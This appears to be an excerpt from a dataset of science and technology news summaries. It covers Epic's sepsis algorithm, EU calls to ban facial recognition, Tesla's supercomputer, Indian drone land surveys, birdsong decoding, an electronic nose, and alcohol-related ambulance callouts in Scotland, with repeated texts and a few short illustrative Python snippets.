An algorithm designed by U.S. electronic health record provider Epic Systems to forecast sepsis infections is significantly lacking in accuracy, according to an analysis of data on about 30,000 patients in University of Michigan (U-M) hospitals. U-M researchers said the program overlooked two-thirds of the approximately 2,500 sepsis cases in the data, rarely detected cases missed by medical staff, and was prone to false alarms. The researchers said Epic tells customers its sepsis alert system can correctly differentiate two patients with and without sepsis with at least 76% accuracy, but they determined it was only 63% accurate. U-M's Karandeep Singh said the study highlights wider shortcomings with proprietary algorithms increasingly used in healthcare, noting that the lack of published science on these models is "shocking." A complication of infection known as sepsis is the number one killer in US hospitals. So it's not surprising that more than 100 health systems use an early warning system offered by Epic Systems, the dominant provider of US electronic health records. The system throws up alerts based on a proprietary formula tirelessly watching for signs of the condition in a patient's test results. But a new study using data from nearly 30,000 patients in University of Michigan hospitals suggests Epic's system performs poorly. The authors say it missed two-thirds of sepsis cases, rarely found cases medical staff did not notice, and frequently issued false alarms. Karandeep Singh, an assistant professor at University of Michigan who led the study, says the findings illustrate a broader problem with the proprietary algorithms increasingly used in health care. "They're very widely used, and yet there's very little published on these models," Singh says. "To me that's shocking." The study was published Monday in JAMA Internal Medicine . An Epic spokesperson disputed the study's conclusions, saying the company's system has "helped clinicians save thousands of lives." Epic's is not the first widely used health algorithm to trigger concerns that technology supposed to improve health care is not delivering, or even actively harmful. In 2019, a system used on millions of patients to prioritize access to special care for people with complex needs was found to lowball the needs of Black patients compared to white patients. That prompted some Democratic senators to ask federal regulators to investigate bias in health algorithms. A study published in April found that statistical models used to predict suicide risk in mental health patients performed well for white and Asian patients but poorly for Black patients. The way sepsis stalks hospital wards has made it a special target of algorithmic aids for medical staff. Guidelines from the Centers for Disease Control and Prevention to health providers on sepsis encourage use of electronic medical records for surveillance and predictions. Epic has several competitors offering commercial warning systems, and some US research hospitals have built their own tools . Automated sepsis warnings have huge potential, Singh says, because key symptoms of the condition, such as low blood pressure, can have other causes, making it difficult for staff to spot early. Starting sepsis treatment such as antibiotics just an hour sooner can make a big difference to patient survival. Hospital administrators often take special interest in sepsis response, in part because it contributes to US government hospital ratings . 
Singh runs a lab at Michigan researching applications of machine learning to patient care. He got curious about Epic's sepsis warning system after being asked to chair a committee at the university's health system created to oversee uses of machine learning. As Singh learned more about the tools in use at Michigan and other health systems, he became concerned that they mostly came from vendors that disclosed little about how they worked or performed. His own system had a license to use Epic's sepsis prediction model, which the company told customers was highly accurate. But there had been no independent validation of its performance. Singh and Michigan colleagues tested Epic's prediction model on records for nearly 30,000 patients covering almost 40,000 hospitalizations in 2018 and 2019. The researchers noted how often Epic's algorithm flagged people who developed sepsis as defined by the CDC and the Centers for Medicare and Medicaid Services. And they compared the alerts that the system would have triggered with sepsis treatments logged by staff, who did not see Epic sepsis alerts for patients included in the study. The researchers say their results suggest Epic's system wouldn't make a hospital much better at catching sepsis and could burden staff with unnecessary alerts. The company's algorithm did not identify two-thirds of the roughly 2,500 sepsis cases in the Michigan data. It would have alerted for 183 patients who developed sepsis but had not been given timely treatment by staff.
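For context on what the accuracy figures above describe: the 76% and 63% numbers refer to discrimination, roughly the chance that the score ranks a patient who developed sepsis above one who did not. The short Python sketch below shows how an external validation of that kind can be computed; the scores, labels, and alert threshold are invented placeholders, not Epic's model or the Michigan data.

    # Illustrative only: synthetic stand-ins for vendor alert scores and
    # chart-review sepsis outcomes; not Epic's model or the study's data.
    import numpy as np
    from sklearn.metrics import roc_auc_score, confusion_matrix

    rng = np.random.default_rng(0)
    labels = rng.integers(0, 2, size=1000)        # 1 = patient developed sepsis
    scores = 0.3 * labels + rng.random(1000)      # imperfect risk score

    # Discrimination: chance the score ranks a sepsis case above a non-case.
    auc = roc_auc_score(labels, scores)

    # Operating point: apply the alerting threshold used in production (assumed here).
    alerts = (scores >= 0.6).astype(int)
    tn, fp, fn, tp = confusion_matrix(labels, alerts).ravel()
    sensitivity = tp / (tp + fn)                  # share of sepsis cases that got an alert
    ppv = tp / (tp + fp)                          # share of alerts that were real cases
    print(f"AUC={auc:.2f}  sensitivity={sensitivity:.2f}  PPV={ppv:.2f}")

The Michigan team's point is precisely that this kind of check, run on data the vendor never saw, can give very different numbers from the ones quoted to customers.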
215
EU Data Protection Authorities Call for Ban on Facial Recognition
The European Data Protection Supervisor (EDPS) and the European Data Protection Board (EDPB) have urged a ban on the use of artificial intelligence (AI)-driven facial recognition technology in public places. The European Commission's AI bill limits its use in public places by law enforcement, without prohibiting it outright. In a joint statement, EDPB chair Andrea Jelinek and EDPS Wojciech Wiewiorowski said, "A general ban on the use of facial recognition in publicly accessible areas is the necessary starting point if we want to preserve our freedoms and create a human-centric legal framework for AI." They also urged a ban on logging gait, fingerprints, DNA, voice, keystrokes, and other biometric data, as well as on AI systems that biometrically distinguish ethnicity, gender, and political or sexual orientation.
[]
[]
[]
scitechnews
None
None
None
None
The European Data Protection Supervisor (EDPS) and the European Data Protection Board (EDPB) have urged a ban on the use of artificial intelligence (AI)-driven facial recognition technology in public places. The European Commission's AI bill limits its use in public places by law enforcement, without prohibiting it outright. In a joint statement, EDPB chair Andrea Jelinek and EDPS Wojciech Wiewiorowski said, "A general ban on the use of facial recognition in publicly accessible areas is the necessary starting point if we want to preserve our freedoms and create a human-centric legal framework for AI." They also urged a ban on logging gait, fingerprints, DNA, voice, keystrokes, and other biometric data, as well as on AI systems that biometrically distinguish ethnicity, gender, and political or sexual orientation.
216
Tesla Backs Vision-Only Approach to Autonomy Using Supercomputer
Tesla CEO Elon Musk has been teasing a neural network training computer called "Dojo" since at least 2019. Musk says Dojo will be able to process vast amounts of video data to achieve vision-only autonomous driving. While Dojo itself is still in development, Tesla today revealed a new supercomputer that will serve as a development prototype version of what Dojo will ultimately offer. At the 2021 Conference on Computer Vision and Pattern Recognition on Monday, Tesla's head of AI, Andrej Karpathy, revealed the company's new supercomputer that allows the automaker to ditch radar and lidar sensors on self-driving cars in favor of high-quality optical cameras. During his workshop on autonomous driving, Karpathy explained that to get a computer to respond to a new environment in a way that a human can requires an immense data set, and a massively powerful supercomputer to train the company's neural net-based autonomous driving technology using that data set. Hence the development of these predecessors to Dojo. Tesla's newest-generation supercomputer has 10 petabytes of "hot tier" NVME storage and runs at 1.6 terabytes per second, according to Karpathy. With 1.8 EFLOPS, he said it might be the fifth most powerful supercomputer in the world, but he conceded later that his team has not yet run the specific benchmark necessary to enter the TOP500 Supercomputing rankings. "That said, if you take the total number of FLOPS it would indeed place somewhere around the fifth spot," Karpathy told TechCrunch. "The fifth spot is currently occupied by Nvidia with their Selene cluster, which has a very comparable architecture and similar number of GPUs (4480 versus ours 5760, so a bit less)." Musk has been advocating for a vision-only approach to autonomy for some time, in large part because cameras are faster than radar or lidar. As of May, Tesla Model Y and Model 3 vehicles in North America are being built without radar, relying on cameras and machine learning to support its advanced driver assistance system and autopilot. Many autonomous driving companies use lidar and high-definition maps, which means they require incredibly detailed maps of the places where they're operating, including all road lanes and how they connect, traffic lights and more. "The approach we take is vision-based, primarily using neural networks that can in principle function anywhere on earth," said Karpathy in his workshop. Replacing a "meat computer," or rather, a human, with a silicon computer results in lower latencies (better reaction time), 360 degree situational awareness and a fully attentive driver that never checks their Instagram, said Karpathy. Karpathy shared some scenarios of how Tesla's supercomputer employs computer vision to correct bad driver behavior, including an emergency braking scenario in which the computer's object detection kicks in to save a pedestrian from being hit, and traffic control warning that can identify a yellow light in the distance and send an alert to a driver that hasn't yet started to slow down. Tesla vehicles have also already proven a feature called pedal misapplication mitigation, in which the car identifies pedestrians in its path, or even a lack of a driving path, and responds to the driver accidentally stepping on the gas instead of braking, potentially saving pedestrians in front of the vehicle or preventing the driver from accelerating into a river.
Tesla's supercomputer collects video from eight cameras that surround the vehicle at 36 frames per second, which provides insane amounts of information about the environment surrounding the car, Karpathy explained. While the vision-only approach is more scalable than collecting, building and maintaining high-definition maps everywhere in the world, it's also much more of a challenge, because the neural networks doing the object detection and handling the driving have to be able to collect and process vast quantities of data at speeds that match the depth and velocity recognition capabilities of a human. Karpathy says after years of research, he believes it can be done by treating the challenge as a supervised learning problem. Engineers testing the tech found they could drive around sparsely populated areas with zero interventions, said Karpathy, but "definitely struggle a lot more in very adversarial environments like San Francisco." For the system to truly work well and mitigate the need for things like high-definition maps and additional sensors, it'll have to get much better at dealing with densely populated areas. One of the Tesla AI team game changers has been auto-labeling, through which it can automatically label things like roadway hazards and other objects from millions of videos captured by vehicles on a Tesla camera. Large AI data sets have often required a lot of manual labeling, which is time-consuming, especially when trying to arrive at the kind of cleanly-labeled data set required to make a supervised learning system on a neural network work well. With this latest supercomputer, Tesla has accumulated 1 million videos of around 10 seconds each and labeled 6 billion objects with depth, velocity and acceleration. All of this takes up a whopping 1.5 petabytes of storage. That seems like a massive amount, but it'll take a lot more before the company can achieve the kind of reliability it requires out of an automated driving system that relies on vision systems alone, hence the need to continue developing ever more powerful supercomputers in Tesla's pursuit of more advanced AI.
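As a rough back-of-the-envelope pass over the figures quoted above (the per-GPU and per-frame numbers below are derived estimates, not values Tesla has reported):

    # Rough arithmetic from the quoted figures; derived values are estimates only.
    total_flops = 1.8e18                  # 1.8 EFLOPS
    gpus = 5760
    print(f"~{total_flops / gpus / 1e12:.0f} TFLOPS per GPU")            # ~313, implying mixed/low precision

    clips, storage_bytes = 1_000_000, 1.5e15                             # 1.5 PB total
    bytes_per_clip = storage_bytes / clips
    print(f"~{bytes_per_clip / 1e9:.1f} GB per ~10-second clip")         # ~1.5 GB

    frames_per_clip = 8 * 36 * 10         # 8 cameras x 36 fps x ~10 s = 2,880 frames
    print(f"~{bytes_per_clip / frames_per_clip / 1e6:.2f} MB per frame on average")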
Tesla's Andrej Karpathy unveiled a new supercomputer at the 2021 Conference on Computer Vision and Pattern Recognition, a prototype of what the automaker's neural network training computer, Dojo, ultimately will become. Tesla CEO Elon Musk has said Dojo will make vision-only autonomous driving a reality. With this new supercomputer, Tesla can replace radar and LiDAR sensors on self-driving cars with high-quality optical cameras. It boasts 10 petabytes of "hot tier" NVME storage and runs at 1.6 terabytes per second. Karpathy said that with 1.8 EFLOPS, Dojo could be the fifth most-powerful supercomputer in the world. Tesla used the supercomputer to gather about 1 million videos of about 10 seconds each and label 6 billion objects within those videos with regard to depth, velocity, and acceleration.
[]
[]
[]
scitechnews
None
None
None
None
Tesla's Andrej Karpathy unveiled a new supercomputer at the 2021 Conference on Computer Vision and Pattern Recognition, a prototype of what the automaker's neural network training computer, Dojo, ultimately will become. Tesla CEO Elon Musk has said Dojo will make vision-only autonomous driving a reality. With this new supercomputer, Tesla can replace radar and LiDAR sensors on self-driving cars with high-quality optical cameras. It boasts 10 petabytes of "hot tier" NVME storage and runs at 1.6 terabytes per second. Karpathy said that with 1.8 EFLOPS, Dojo could be the fifth most-powerful supercomputer in the world. Tesla used the supercomputer to gather about 1 million videos of about 10 seconds each and label 6 billion objects within those videos with regard to depth, velocity, and acceleration. Tesla CEO Elon Musk has been teasing a neural network training computer called "Dojo" since at least 2019. Musk says Dojo will be able to process vast amounts of video data to achieve vision-only autonomous driving. While Dojo itself is still in development, Tesla today revealed a new supercomputer that will serve as a development prototype version of what Dojo will ultimately offer. At the 2021 Conference on Computer Vision and Pattern Recognition on Monday, Tesla's head of AI, Andrej Karpathy, revealed the company's new supercomputer that allows the automaker to ditch radar and lidar sensors on self-driving cars in favor of high-quality optical cameras. During his workshop on autonomous driving, Karpathy explained that to get a computer to respond to a new environment in a way that a human can requires an immense data set, and a massively powerful supercomputer to train the company's neural net-based autonomous driving technology using that data set. Hence the development of these predecessors to Dojo. Tesla's newest-generation supercomputer has 10 petabytes of "hot tier" NVME storage and runs at 1.6 terabytes per second, according to Karpathy. With 1.8 EFLOPS, he said it might be the fifth most powerful supercomputer in the world, but he conceded later that his team has not yet run the specific benchmark necessary to enter the TOP500 Supercomputing rankings. "That said, if you take the total number of FLOPS it would indeed place somewhere around the fifth spot," Karpathy told TechCrunch. "The fifth spot is currently occupied by Nvidia with their Selene cluster, which has a very comparable architecture and similar number of GPUs (4480 versus ours 5760, so a bit less)." Musk has been advocating for a vision-only approach to autonomy for some time, in large part because cameras are faster than radar or lidar. As of May, Tesla Model Y and Model 3 vehicles in North America are being built without radar, relying on cameras and machine learning to support its advanced driver assistance system and autopilot. Many autonomous driving companies use lidar and high-definition maps, which means they require incredibly detailed maps of the places where they're operating, including all road lanes and how they connect, traffic lights and more. "The approach we take is vision-based, primarily using neural networks that can in principle function anywhere on earth," said Karpathy in his workshop. Replacing a "meat computer," or rather, a human, with a silicon computer results in lower latencies (better reaction time), 360 degree situational awareness and a fully attentive driver that never checks their Instagram, said Karpathy.
Karpathy shared some scenarios of how Tesla's supercomputer employs computer vision to correct bad driver behavior, including an emergency braking scenario in which the computer's object detection kicks in to save a pedestrian from being hit, and traffic control warning that can identify a yellow light in the distance and send an alert to a driver that hasn't yet started to slow down. Tesla vehicles have also already proven a feature called pedal misapplication mitigation, in which the car identifies pedestrians in its path, or even a lack of a driving path, and responds to the driver accidentally stepping on the gas instead of braking, potentially saving pedestrians in front of the vehicle or preventing the driver from accelerating into a river. Tesla's supercomputer collects video from eight cameras that surround the vehicle at 36 frames per second, which provides insane amounts of information about the environment surrounding the car, Karpathy explained. While the vision-only approach is more scalable than collecting, building and maintaining high-definition maps everywhere in the world, it's also much more of a challenge, because the neural networks doing the object detection and handling the driving have to be able to collect and process vast quantities of data at speeds that match the depth and velocity recognition capabilities of a human. Karpathy says after years of research, he believes it can be done by treating the challenge as a supervised learning problem. Engineers testing the tech found they could drive around sparsely populated areas with zero interventions, said Karpathy, but "definitely struggle a lot more in very adversarial environments like San Francisco." For the system to truly work well and mitigate the need for things like high-definition maps and additional sensors, it'll have to get much better at dealing with densely populated areas. One of the Tesla AI team game changers has been auto-labeling, through which it can automatically label things like roadway hazards and other objects from millions of videos captured by vehicles on a Tesla camera. Large AI data sets have often required a lot of manual labeling, which is time-consuming, especially when trying to arrive at the kind of cleanly-labeled data set required to make a supervised learning system on a neural network work well. With this latest supercomputer, Tesla has accumulated 1 million videos of around 10 seconds each and labeled 6 billion objects with depth, velocity and acceleration. All of this takes up a whopping 1.5 petabytes of storage. That seems like a massive amount, but it'll take a lot more before the company can achieve the kind of reliability it requires out of an automated driving system that relies on vision systems alone, hence the need to continue developing ever more powerful supercomputers in Tesla's pursuit of more advanced AI.
217
Digitizing Rural Land Records, 1 Drone at a Time
Nagar and his team went on to study the idea and in April 2020 a pilot project was launched under the Ministry of Panchayati Raj in collaboration with state Panchayati Raj departments, state revenue departments and the Survey of India as technology partner. The pilot operated in nine states - Uttar Pradesh, Uttarakhand, Madhya Pradesh, Haryana, Maharashtra, Karnataka, Punjab, Rajasthan and Andhra Pradesh - according to a statement by the Ministry of Panchayati Raj. In April this year, it was rolled out for implementation across the country and is expected to cover about 6.62 lakh villages by 2024. Hundreds of drone flights have already taken place, collecting aerial images across the country, ranging from the foothills of the Himalayas to the deserts of Rajasthan.
The Indian government's Svamitva (Survey of Villages and Mapping with Improvised Technology in Village Areas) project involves the use of drone technology to survey the inhabited areas of rural villages. The project aims to give villagers a "record of rights" that could be used as an asset and to handle property disputes. A pilot project in nine states was rolled out nationwide in April 2021, and aims to cover about 662,000 villages by 2024. The process involves marking property boundaries with limestone powder and using drones to collect high-resolution aerial images. The images are sent to the Survey of India to be transformed into maps, and villagers are given 15 days to verify the accuracy of their maps. Almost 46,000 villages had been surveyed as of early May.
[]
[]
[]
scitechnews
None
None
None
None
The Indian government's Svamitva (Survey of Villages and Mapping with Improvised Technology in Village Areas) project involves the use of drone technology to survey the inhabited areas of rural villages. The project aims to give villagers a "record of rights" that could be used as an asset and to handle property disputes. A pilot project in nine states was rolled out nationwide in April 2021, and aims to cover about 662,000 villages by 2024. The process involves marking property boundaries with limestone powder and using drones to collect high-resolution aerial images. The images are sent to the Survey of India to be transformed into maps, and villagers are given 15 days to verify the accuracy of their maps. Almost 46,000 villages had been surveyed as of early May. Nagar and his team went on to study the idea and in April 2020 a pilot project was launched under the Ministry of Panchayati Raj in collaboration with state Panchayati Raj departments, state revenue departments and the Survey of India as technology partner. The pilot operated in nine states - Uttar Pradesh, Uttarakhand, Madhya Pradesh, Haryana, Maharashtra, Karnataka, Punjab, Rajasthan and Andhra Pradesh - according to a statement by the Ministry of Panchayati Raj. In April this year, it was rolled out for implementation across the country and is expected to cover about 6.62 lakh villages by 2024. Hundreds of drone flights have already taken place, collecting aerial images across the country, ranging from the foothills of the Himalayas to the deserts of Rajasthan.
219
Researchers Create Brain Interface That Can Sing What a Bird's Thinking
Researchers from the University of California San Diego recently built a machine learning system that predicts what a bird's about to sing as it's singing it. The big idea here is real-time speech synthesis for vocal prosthesis. But the implications could go much further. Up front: Birdsong is a complex form of communication that involves rhythm, pitch, and, most importantly, learned behaviors. According to the researchers, teaching an AI to understand these songs is a valuable step in training systems that can replace biological human vocalizations: But translating vocalizations in real-time is no easy challenge. Current state-of-the-art systems are slow compared to our natural thought-to-speech patterns. Think about it: cutting-edge natural language processing systems struggle to keep up with human thought. When you interact with your Google Assistant or Alexa virtual assistant, there's often a longer pause than you'd expect if you were talking to a real person. This is because the AI is processing your speech, determining what each word means in relation to its abilities, and then figuring out which packages or programs to access and deploy. In the grand scheme, it's amazing that these cloud-based systems work as fast as they do. But they're still not good enough for the purpose of creating a seamless interface for non-vocal people to speak through at the speed of thought. The work: First, the team implanted electrodes in a dozen bird brains (zebra finches, to be specific) and then started recording activity as the birds sang. But it's not enough just to train an AI to recognize neural activity as a bird sings - even a bird's brain is far too complex to entirely map how communications work across its neurons. So the researchers trained another system to reduce real-time songs down to recognizable patterns the AI can work with. Quick take: This is pretty cool in that it does provide a solution to an outstanding problem. Processing birdsong in real-time is impressive and replicating these results with human speech would be a eureka moment. But, this early work isn't ready for primetime just yet. It appears to be a shoebox solution in that it's not necessarily adaptable to other speech systems in its current iteration. In order to get it functioning fast enough, the researchers had to create a shortcut to speech analysis that might not work when you expand it beyond a bird's vocabulary. That being said, with further development this could be among the first giant technological leaps for brain-computer interfaces since the deep learning renaissance of 2014. Read the whole paper here.
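To give a flavor of the "reduce the song to a pattern the model can work with" step described above, here is a minimal Python sketch. It is not the UCSD pipeline: the sample rate, the synthetic one-note motif, and the 8-dimensional compression are all assumptions chosen for illustration.

    # Hedged sketch: compress audio into a low-dimensional trajectory that a
    # downstream predictor could be trained on. Not the published method.
    import numpy as np
    from scipy.signal import spectrogram
    from sklearn.decomposition import PCA

    fs = 32000                                                  # assumed sample rate (Hz)
    t = np.arange(0, 2.0, 1 / fs)
    song = np.sin(2 * np.pi * 3000 * t) * np.hanning(t.size)    # synthetic stand-in for a finch motif

    f, times, sxx = spectrogram(song, fs=fs, nperseg=512)       # time-frequency representation
    log_power = np.log1p(sxx).T                                 # frames x frequency bins

    pca = PCA(n_components=8)                                   # compress each frame to 8 numbers
    trajectory = pca.fit_transform(log_power)
    print(trajectory.shape)   # (n_frames, 8): a compact "pattern" a predictor could consume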
A machine learning system developed by University of California San Diego researchers can predict what a bird is about to sing, a step on the road to training systems to translate human speech in real time. The researchers implanted electrodes in the brains of a dozen zebra finches and recorded neural activity as the birds sang. They trained another system to reduce the birds' real-time songs to recognizable patterns. The researchers said, "Birdsong shares a number of unique similarities with human speech, and its study has yielded general insight into multiple mechanisms and circuits behind learning, execution, and maintenance of vocal motor skill."
[]
[]
[]
scitechnews
None
None
None
None
A machine learning system developed by University of California San Diego researchers can predict what a bird is about to sing, a step on the road to training systems to translate human speech in real time. The researchers implanted electrodes in the brains of a dozen zebra finches and recorded neural activity as the birds sang. They trained another system to reduce the birds' real-time songs to recognizable patterns. The researchers said, "Birdsong shares a number of unique similarities with human speech, and its study has yielded general insight into multiple mechanisms and circuits behind learning, execution, and maintenance of vocal motor skill." Researchers from the University of California San Diego recently built a machine learning system that predicts what a bird's about to sing as it's singing it. The big idea here is real-time speech synthesis for vocal prosthesis. But the implications could go much further. Up front: Birdsong is a complex form of communication that involves rhythm, pitch, and, most importantly, learned behaviors. According to the researchers, teaching an AI to understand these songs is a valuable step in training systems that can replace biological human vocalizations: But translating vocalizations in real-time is no easy challenge. Current state-of-the-art systems are slow compared to our natural thought-to-speech patterns. Think about it: cutting-edge natural language processing systems struggle to keep up with human thought. When you interact with your Google Assistant or Alexa virtual assistant, there's often a longer pause than you'd expect if you were talking to a real person. This is because the AI is processing your speech, determining what each word means in relation to its abilities, and then figuring out which packages or programs to access and deploy. In the grand scheme, it's amazing that these cloud-based systems work as fast as they do. But they're still not good enough for the purpose of creating a seamless interface for non-vocal people to speak through at the speed of thought. The work: First, the team implanted electrodes in a dozen bird brains (zebra finches, to be specific) and then started recording activity as the birds sang. But it's not enough just to train an AI to recognize neural activity as a bird sings - even a bird's brain is far too complex to entirely map how communications work across its neurons. So the researchers trained another system to reduce real-time songs down to recognizable patterns the AI can work with. Quick take: This is pretty cool in that it does provide a solution to an outstanding problem. Processing birdsong in real-time is impressive and replicating these results with human speech would be a eureka moment. But, this early work isn't ready for primetime just yet. It appears to be a shoebox solution in that it's not necessarily adaptable to other speech systems in its current iteration. In order to get it functioning fast enough, the researchers had to create a shortcut to speech analysis that might not work when you expand it beyond a bird's vocabulary. That being said, with further development this could be among the first giant technological leaps for brain-computer interfaces since the deep learning renaissance of 2014. Read the whole paper here.
220
Israeli Researchers Develop Electronic Nose to Detect Diseases, Poisons
An artificial nose developed by researchers at Israel's Ben-Gurion University of the Negev (BGU) can distinguish between different types of bacteria, viruses, and poisonous gases based on their "smell print." This smell print is produced by the absorption of gases using carbon nanoparticles and the electrical reaction caused by the particles as a result of the absorption. The researchers said they "were able to 'train' the electronic nose using machine learning techniques to detect different gas molecules, individually or in a mixture, with high accuracy." BGU's Raz Jelinek said the low-cost technology could be used to warn cities about the presence of dangerous gases and air pollution, detect bacterial infections within an hour via a "throat swab" test, and warn of the presence of bacteria in food products.
[]
[]
[]
scitechnews
None
None
None
None
An artificial nose developed by researchers at Israel's Ben-Gurion University of the Negev (BGU) can distinguish between different types of bacteria, viruses, and poisonous gases based on their "smell print." This smell print is produced by the absorption of gases using carbon nanoparticles and the electrical reaction caused by the particles as a result of the absorption. The researchers said they "were able to 'train' the electronic nose using machine learning techniques to detect different gas molecules, individually or in a mixture, with high accuracy." BGU's Raz Jelinek said the low-cost technology could be used to warn cities about the presence of dangerous gases and air pollution, detect bacterial infections within an hour via a "throat swab" test, and warn of the presence of bacteria in food products.
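To make the "train the nose with machine learning" idea concrete, here is a minimal sketch. The 16 sensing channels, the three gases, and the synthetic response vectors are assumptions for illustration; they are not BGU's data or model.

    # Hedged sketch of classifying "smell prints" from multi-channel sensor responses.
    import numpy as np
    from sklearn.ensemble import RandomForestClassifier
    from sklearn.model_selection import train_test_split

    rng = np.random.default_rng(1)
    n_channels = 16                                # assumed number of nanoparticle sensing channels
    gases = ["ammonia", "acetone", "clean_air"]

    # Each gas gets a characteristic mean response pattern plus measurement noise.
    prototypes = rng.normal(size=(len(gases), n_channels))
    X = np.vstack([p + 0.2 * rng.normal(size=(100, n_channels)) for p in prototypes])
    y = np.repeat(gases, 100)

    X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.25, random_state=0)
    clf = RandomForestClassifier(n_estimators=200, random_state=0).fit(X_tr, y_tr)
    print(f"held-out accuracy: {clf.score(X_te, y_te):.2f}")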
223
Algorithm Shows the Alcohol Burden on Ambulance Service in Scotland
86,780 ambulance callouts were identified as alcohol-related in 2019, using a new method based on the notes taken by paramedics at the scene. This figure, an average of more than 230 call-outs every day, is more than three times higher than previously reported. Whilst paramedics have long described a heavy burden of alcohol on the Scottish ambulance service, this is the first study to accurately quantify that burden in a robust way that can be routinely monitored. Ambulance services often represent a patient's first - and sometimes only - contact with health services for a particular alcohol-related issue. In new research led by Francesco Manca and Professor Jim Lewsey at the University of Glasgow and published in the International Journal of Environmental Research and Public Health, researchers reveal a new approach to accurately determine how many ambulance callouts are alcohol-related. The work was part of a study led by Professor Niamh Fitzgerald at the University of Stirling, and was also co-authored by colleagues at the University of Sheffield and the Scottish Ambulance Service (SAS). Using data from SAS, the team of researchers were able to build a highly accurate algorithm that searched paramedic notes in patient records for references to alcohol. Applying this automated method to records from 2019, they found that one in six ambulance callouts (16.2%) was alcohol-related. This rose to over one in four (28.2%) at weekend nighttimes (6pm to 6am). The algorithm showed that age was an important factor - with alcohol being related to approximately a quarter of callouts for those aged under 40 years old, but less than 7% in those aged 70 years old and above. Socio-economic deprivation was also found to be a factor. For callouts to addresses in the most deprived areas, 20% were deemed to be alcohol-related, while for callouts in the least deprived areas, 10% were alcohol-related. The algorithm was found to perform very well (99% accuracy) in identifying callouts from notes when compared to the professional judgement of an experienced paramedic who reviewed complete patient records. This method also has the advantage over previous methods of being easy for SAS to apply routinely to monitor alcohol-related callouts over time. Prior methods resulted in either large underestimates or used reports from staff surveys which could not be tested for accuracy or routinely carried out. Prof Jim Lewsey, Professor of Medical Statistics, of the University of Glasgow's Institute of Health and Wellbeing, said: "We have shown that there is a high burden of alcohol on ambulance callouts in Scotland. This is particularly true at weekends, for callouts involving younger people and for callouts to addresses in areas with high levels of socio-economic deprivation. These data can be used to monitor trends over time and inform alcohol policy decision making both at local and national levels. Further, our methodological approach can be applied to other contexts for determining the burden of other factors to the ambulance service." Based on the average cost of an ambulance callout in 2019, researchers estimate the total cost of alcohol-related callouts at approximately £31.5 million, though the exact figure would depend on the complexity of alcohol-related call outs, compared with non-alcohol-related call outs. Importantly, this analysis did not examine how many alcohol-related callouts arose from drinking in homes or licensed premises. 
Prof Niamh Fitzgerald, Professor of Alcohol Policy and Director of the Institute for Social Marketing and Health at the University of Stirling is Principal Investigator for the overall study evaluating the impact of minimum unit pricing of alcohol on alcohol-related ambulance callouts in Scotland. Prof. Fitzgerald added: "As we emerge from the COVID-19 pandemic, we all want to protect NHS services for when they are most needed. It is timely therefore to consider whether it is acceptable that over 230 ambulance callouts every day are linked to alcohol when we have policy solutions that can reduce this burden. We are also conducting further research to understand what types of callouts and drinking locations give rise to these figures and how they are experienced by paramedics." Dr Jim Ward, Medical Director at the Scottish Ambulance Service (SAS) said: "This study is very welcome as it gives SAS the ability to better understand the impact alcohol has on the demand for ambulance response. Our frontline staff consistently see the serious effects unsafe levels of alcohol have on people's lives and we would urge the public to drink responsibly." The study, 'Estimating the burden of alcohol on ambulance callouts through development and validation of an algorithm using electronic patient records' is published in the International Journal of Environmental Research and Public Health. The work was funded by the Scottish Government Chief Scientist Office. Enquiries: [email protected] or [email protected] / 0141 330 6557 or 0141 330 4831 First published: 21 June 2021
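The published algorithm is considerably more extensive than this, but a minimal sketch of flagging free-text paramedic notes conveys the basic idea; the term list, negation handling, and example notes below are illustrative assumptions, not the validated Glasgow/SAS rule set.

    # Hedged sketch: flag callouts whose notes mention alcohol, ignoring explicit negations.
    import re

    ALCOHOL_TERMS = re.compile(
        r"\b(alcohol|intoxicat\w*|drunk|etoh|vodka|beer|wine|binge)\b", re.IGNORECASE
    )
    NEGATIONS = re.compile(r"\b(no|denies|nil)\s+(alcohol|etoh)\b", re.IGNORECASE)

    def alcohol_related(note: str) -> bool:
        """Return True if the note mentions alcohol and is not an explicit negation."""
        return bool(ALCOHOL_TERMS.search(note)) and not NEGATIONS.search(note)

    notes = [
        "Pt found on street, strong smell of alcohol, GCS 14",
        "Chest pain, denies alcohol use, no ETOH on scene",
    ]
    print([alcohol_related(n) for n in notes])   # [True, False]

In the study itself, an approach along these lines was validated against an experienced paramedic's review of complete patient records, which is what supports the 99% agreement figure.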
Researchers at the U.K.'s University of Glasgow led a team that developed an algorithm to determine the number of alcohol-related ambulance callouts by the Scottish Ambulance Service (SAS). The study, the first to quantify the burden of alcohol on SAS, used 2019 SAS data to determine that 16.2% of ambulance callouts were alcohol-related, more than three times higher than reported previously. The algorithm searches paramedic notes in patient records for references to alcohol with 99% accuracy compared to reviews of records by an experienced paramedic. The researchers estimated the total cost of these callouts at about £31.5 million (US$44 million). SAS medical director Dr. Jim Ward said the study helps his organization "to better understand the impact alcohol has on the demand for ambulance response."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the U.K.'s University of Glasgow led a team that developed an algorithm to determine the number of alcohol-related ambulance callouts by the Scottish Ambulance Service (SAS). The study, the first to quantify the burden of alcohol on SAS, used 2019 SAS data to determine that 16.2% of ambulance callouts were alcohol-related, more than three times higher than reported previously. The algorithm searches paramedic notes in patient records for references to alcohol with 99% accuracy compared to reviews of records by an experienced paramedic. The researchers estimated the total cost of these callouts at about £31.5 million (US$44 million). SAS medical director Dr. Jim Ward said the study helps his organization "to better understand the impact alcohol has on the demand for ambulance response." 86,780 ambulance callouts were identified as alcohol-related in 2019, using a new method based on the notes taken by paramedics at the scene. This figure, an average of more than 230 call-outs every day, is more than three times higher than previously reported. Whilst paramedics have long described a heavy burden of alcohol on the Scottish ambulance service, this is the first study to accurately quantify that burden in a robust way that can be routinely monitored. Ambulance services often represent a patient's first - and sometimes only - contact with health services for a particular alcohol-related issue. In new research led by Francesco Manca and Professor Jim Lewsey at the University of Glasgow and published in the International Journal of Environmental Research and Public Health, researchers reveal a new approach to accurately determine how many ambulance callouts are alcohol-related. The work was part of a study led by Professor Niamh Fitzgerald at the University of Stirling, and was also co-authored by colleagues at the University of Sheffield and the Scottish Ambulance Service (SAS). Using data from SAS, the team of researchers were able to build a highly accurate algorithm that searched paramedic notes in patient records for references to alcohol. Applying this automated method to records from 2019, they found that one in six ambulance callouts (16.2%) was alcohol-related. This rose to over one in four (28.2%) at weekend nighttimes (6pm to 6am). The algorithm showed that age was an important factor - with alcohol being related to approximately a quarter of callouts for those aged under 40 years old, but less than 7% in those aged 70 years old and above. Socio-economic deprivation was also found to be a factor. For callouts to addresses in the most deprived areas, 20% were deemed to be alcohol-related, while for callouts in the least deprived 